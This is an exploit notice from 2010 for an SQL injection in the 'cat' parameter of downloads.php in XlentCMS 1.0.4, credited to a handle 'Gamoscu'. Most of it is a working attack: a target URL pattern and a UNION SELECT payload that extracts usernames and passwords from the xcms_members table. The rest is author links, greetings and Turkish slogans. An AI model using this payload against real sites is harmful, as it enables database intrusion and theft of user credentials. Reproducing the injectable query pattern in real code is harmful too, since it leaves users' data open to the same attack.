XlentCMS V1.0.4 (downloads.php?cat) SQL Injection Vulnerability :

Date : 2010-01-01 Author : Gamoscu
 Script      : XlentCMS V1.0.4 (downloads.php?cat) SQL Injection Vulnerability

 Script site : http://sphere.xlentprojects.se/portal.php 

 AUTHOR      : Gamoscu
   
 HOME        : http://www.1923turk.biz

 Blog        : http://gamoscu.wordpress.com/

 Greetz      : Manas58 Baybora Delibey Tiamo Psiko Turco infazci X-TRO
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
http://www.xxx.com/path/downloads.php?cat=[SQL]

Example:

1+union+select+1,id,3,4,username%20,password,7,8,9+from+xcms_members--


Vatan Lafla De�il Eylemle Sevilir

Kiskananlar catlasin Zorunuza Gitmesin

C1

 

C2

 

C3